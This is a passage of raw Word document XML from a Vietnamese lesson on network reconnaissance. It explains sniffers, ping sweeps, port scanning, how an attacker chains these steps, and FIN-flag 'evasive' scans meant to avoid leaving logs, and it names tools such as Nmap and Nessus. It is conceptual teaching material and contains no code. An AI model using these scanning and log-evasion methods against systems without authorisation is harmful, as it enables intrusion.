          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>đùng thiết bị đặc biệt cho WAN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE515E0" w14:textId="7CDE1C32" w:rsidR="00B75764" w:rsidRDefault="00B75764" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>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Phải có bộ giải mã (decode) để chuyển các bit 0,1 thành thông tin có thể hiểu được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7A2B5B" w14:textId="77777777" w:rsid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p>
    <w:p w14:paraId="6FEC97B5" w14:textId="7ACAB37F" w:rsid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ác sniffer thông dụng hiện nay:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035F519D" w14:textId="267451AD"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Ngrep.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2149C76D" w14:textId="3E40B17C"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Etheral.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399C5A4B" w14:textId="56CB0905"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Wireshảk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2804AF6F" w14:textId="7A90F3F9"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Packet Inspector.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C5C12E" w14:textId="2AECCF75" w:rsidR="00B75764" w:rsidRDefault="00B75764" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>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Dsniff.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0085DFF1" w14:textId="00C1F77C" w:rsid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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C3FF656" wp14:editId="2CDA141E">
            <wp:extent cx="3746500" cy="22225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6500" cy="2222500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45427DD4" w14:textId="77777777" w:rsidR="00B75764" w:rsidRPr="00B75764" w:rsidRDefault="00B75764" w:rsidP="00B75764">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C34AD0C" w14:textId="32FA99DC" w:rsidR="00372720" w:rsidRDefault="00372720" w:rsidP="007F0962">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="207"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B75764">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Quét địa chỉ IP</w:t>
      </w:r>
      <w:r w:rsidR="00B75764">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Ping sweep):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0295725B" w14:textId="77777777" w:rsidR="000E08FA" w:rsidRDefault="000E08FA" w:rsidP="00B75764">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="462822C1" w14:textId="77777777" w:rsidR="000E08FA" w:rsidRDefault="000E08FA" w:rsidP="000E08FA">
      <w:pPr>
        <w:ind w:firstLine="360"/>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Ping sweep là kỹ thuật quét một dải địa chỉ IP để phát hiện xem có thiết bị nào đang sở hữu địa chỉ IP trong dải đó. Công cụ ping sweep sẽ gửi gói tin ICMP echo request tới tất cả các địa chỉ IP trong dải và chờ đợi gói tin ICMP echo reply phản hồi từ các thiết bị.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A50BB24" w14:textId="77777777" w:rsidR="000E08FA" w:rsidRDefault="000E08FA" w:rsidP="00B75764">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52ED524F" w14:textId="2E0D0B73" w:rsidR="00B75764" w:rsidRDefault="00B75764" w:rsidP="00B75764">
      <w:pPr>
        <w:ind w:firstLine="360"/>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Hacker sẽ gủi gói ICMP re</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>quest đến địa chỉ đích hoặc gửi cho cả nhánh mạng đích. Host nào phản hồi lại chứng tỏ host đó tồn tại và đang hoạt động.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DC4342" w14:textId="77777777" w:rsidR="00B75764" w:rsidRDefault="00B75764" w:rsidP="00B75764">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="457D17C3" w14:textId="0ABC2866" w:rsidR="00B75764" w:rsidRDefault="00B75764" w:rsidP="00B75764">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ác công cụ quyét địa chỉ thông dụng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36703C0A" w14:textId="187BB6E0"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Fping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A396F9D" w14:textId="602399F5"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Network Sonar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324A1C12" w14:textId="4E374D14"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Ping Sweep.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D76B2B" w14:textId="7167FD95" w:rsidR="00B75764" w:rsidRPr="00B75764" w:rsidRDefault="00B75764" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>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Pinger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789B1B01" w14:textId="77777777" w:rsidR="00B75764" w:rsidRDefault="00B75764" w:rsidP="00B75764">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D781FA9" w14:textId="63123FBE" w:rsidR="00B75764" w:rsidRDefault="00B75764" w:rsidP="00B75764">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Nếu host không trả lời, chứng tỏ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460258B7" w14:textId="2BDE5773" w:rsidR="00B75764" w:rsidRPr="00B75764" w:rsidRDefault="00B75764" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>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 xml:space="preserve">Địa chỉ đó không tồn tại. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F33A8C4" w14:textId="0102163F" w:rsidR="00B75764" w:rsidRPr="00B75764" w:rsidRDefault="00B75764" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>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Host đó đang tắt máy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5232C6D1" w14:textId="2F23B4A3" w:rsidR="00B75764" w:rsidRPr="00B75764" w:rsidRDefault="00B75764" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:num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Host đó hoặc hệ thống mạng đó chặn (block) ICMP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429EDB4E" w14:textId="77777777" w:rsidR="00B75764" w:rsidRPr="00B75764" w:rsidRDefault="00B75764" w:rsidP="00B75764">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BDF7EBF" w14:textId="22CA9015" w:rsidR="00372720" w:rsidRDefault="00372720" w:rsidP="00B75764">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B75764">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Quyét cổng</w:t>
      </w:r>
      <w:r w:rsidR="00B75764">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Port sweep):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AF9431" w14:textId="77777777" w:rsidR="00B75764" w:rsidRDefault="00B75764" w:rsidP="00B75764">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0953CC63" w14:textId="69F34C93" w:rsidR="000E08FA" w:rsidRDefault="000E08FA" w:rsidP="00B75764">
      <w:pPr>
        <w:ind w:firstLine="360"/>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Port scan là công cụ quét cổng. Mỗi dịch vụ chạy trên máy đều gắn với một cổng (well-known port). Công cụ quét cổng sẽ quét một dải các cổng để phát hiện xem cổng nào đang lắng nghe yêu cầu. Nguyên lý là gửi bản tin đến cổng và chờ đợi phản hồi. Nếu có phản hồi từ cổng nào đó tức là cổng đó đang được sử dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CD99CA" w14:textId="77777777" w:rsidR="000E08FA" w:rsidRPr="000E08FA" w:rsidRDefault="000E08FA" w:rsidP="00B75764">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A266834" w14:textId="4D92C566" w:rsidR="00B75764" w:rsidRDefault="00B75764" w:rsidP="00B75764">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B75764">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Mỗi dịch vụ mạng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> đều được gán với ít nhất 1 cổng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEA8CAC" w14:textId="02EB09CE" w:rsidR="000E08FA" w:rsidRPr="000E08FA" w:rsidRDefault="000E08FA" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>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ổng thông dụng (well-know port): 0-1023.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDB4297" w14:textId="30940AED" w:rsidR="000E08FA" w:rsidRPr="000E08FA" w:rsidRDefault="000E08FA" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>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ổng được đăng kí (registerted port): 1024 -49151.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CCCAFD" w14:textId="240E559F" w:rsidR="000E08FA" w:rsidRDefault="000E08FA" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>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ổng dùng riêng (private port): 49152 -65535.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFB5B83" w14:textId="77777777" w:rsidR="000E08FA" w:rsidRDefault="000E08FA" w:rsidP="000E08FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BF279CC" w14:textId="31751976" w:rsidR="000E08FA" w:rsidRPr="000E08FA" w:rsidRDefault="000E08FA" w:rsidP="000E08FA">
      <w:p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Các công cụ quét cổng thông dụng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A10CC29" w14:textId="7F555489" w:rsidR="000E08FA" w:rsidRP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Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FDE560" w14:textId="3E40D3C9" w:rsidR="000E08FA" w:rsidRP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Nesuss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1405D173" w14:textId="5A67E9F5" w:rsidR="000E08FA" w:rsidRP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IPEye.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C7BB45" w14:textId="613210C0" w:rsidR="000E08FA" w:rsidRDefault="000E08FA" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:num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SuperScan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADFD95A" w14:textId="77777777" w:rsidR="000E08FA" w:rsidRDefault="000E08FA" w:rsidP="000E08FA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F678E4B" w14:textId="15566E21" w:rsidR="000E08FA" w:rsidRDefault="000E08FA" w:rsidP="000E08FA">
      <w:pPr>
        <w:ind w:firstLine="567"/>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Ping sweep and port scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> l</w:t>
      </w:r>
      <w:r w:rsidRPr="000E08FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>à 2 công cụ dùng để phát hiện lỗ hổng trên các thiết bị và hệ thống. Các công cụ này sẽ kiểm tra thông tin về địa chỉ IP, cổng, hệ điều hành, phiên bản hệ điều hành, dữ liệu trên cổng TCP và UDP. Kẻ tấn công sử dụng các thông tin này cho mục đích tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCBA488" w14:textId="77777777" w:rsidR="000E08FA" w:rsidRPr="000E08FA" w:rsidRDefault="000E08FA" w:rsidP="000E08FA">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="488D0769" w14:textId="2FB4E49F" w:rsidR="000E08FA" w:rsidRPr="007F0962" w:rsidRDefault="000E08FA" w:rsidP="000E08FA">
      <w:pPr>
        <w:ind w:firstLine="567"/>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t>Kẻ tấn công sẽ sử dụng kết hợp các công cụ trên theo nguyên lý: đầu tiên truy vấn thông tin trên Internet để lấy thông tin về địa chỉ IP của tên miền mà hắn muốn tấn công. Tiếp đó dùng công cụ ping sweep để quét tìm các máy đang hoạt động. Tiếp theo sử dụng công cụ port scan để lấy được thông tin về các cổng và dịch vụ đang hoạt động trên các máy. Sau đó kẻ tấn công tiếp tục rà soát các dịch vụ này để tìm ra những điểm yếu có thể khai thác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3429AE75" w14:textId="1C488A2F" w:rsidR="00372720" w:rsidRDefault="000E08FA" w:rsidP="00372720">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E08FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25E9EE44" wp14:editId="1A66723C">
            <wp:extent cx="5283200" cy="292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2921000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD1997F" w14:textId="2E247239" w:rsidR="000E08FA" w:rsidRDefault="000E08FA" w:rsidP="0069098A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0069098A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Quét né tránh</w:t>
      </w:r>
      <w:r w:rsidR="0069098A" w:rsidRPr="0069098A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Evasive sweep):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473EC5B4" w14:textId="7D4860C7" w:rsidR="0069098A" w:rsidRDefault="0069098A" w:rsidP="0069098A">
      <w:pPr>
        <w:ind w:firstLine="567"/>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K</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ỹ thuật quét né tránh là quyét mà không tại ra kết nối đến hệ thống đó:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B9F712" w14:textId="474E14DC" w:rsidR="0069098A" w:rsidRPr="0069098A" w:rsidRDefault="0069098A" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>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Gửi đến máy tính đích các gói tin được gán cờ trong FIN trong TCP header (có nghĩa là đóng kết nối với host)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D33CD0B" w14:textId="0710842A" w:rsidR="0069098A" w:rsidRPr="0069098A" w:rsidRDefault="0069098A" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>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Nếu máy tính đích có cài dịch vụ mạng: sẽ gửi thông báo lỗi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E43A301" w14:textId="77777777" w:rsidR="0069098A" w:rsidRPr="0069098A" w:rsidRDefault="0069098A" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>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t>Nếu máy tính đích không cài dịch vụ mạng đó: sẽ bỏ qua gói trên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE39BB3" w14:textId="77777777" w:rsidR="0069098A" w:rsidRDefault="0069098A" w:rsidP="0069098A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B6B9554" w14:textId="79EB5109" w:rsidR="0069098A" w:rsidRDefault="0069098A" w:rsidP="0069098A">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Để tránh lưu lại các log file khi kết nói. Hacker có thể dùng kỹ thuật quét nghe lén hay quét có che dấu kết nối. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D909D81" w14:textId="77777777" w:rsidR="0069098A" w:rsidRDefault="0069098A" w:rsidP="0069098A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FF73693" w14:textId="083F36AB" w:rsidR="0069098A" w:rsidRDefault="0069098A" w:rsidP="0069098A">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Các công cụ quét có né tranh thông dụng là: Nmap, IPEye, </w:t>
      </w:r>
      <w:r w:rsidRPr="000E08FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SuperScan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> và AWSPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432C08F2" w14:textId="77777777" w:rsidR="0069098A" w:rsidRDefault="0069098A" w:rsidP="0069098A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F79A1C1" w14:textId="6DF0C92F" w:rsidR="0069098A" w:rsidRDefault="0069098A" w:rsidP="0069098A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0069098A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
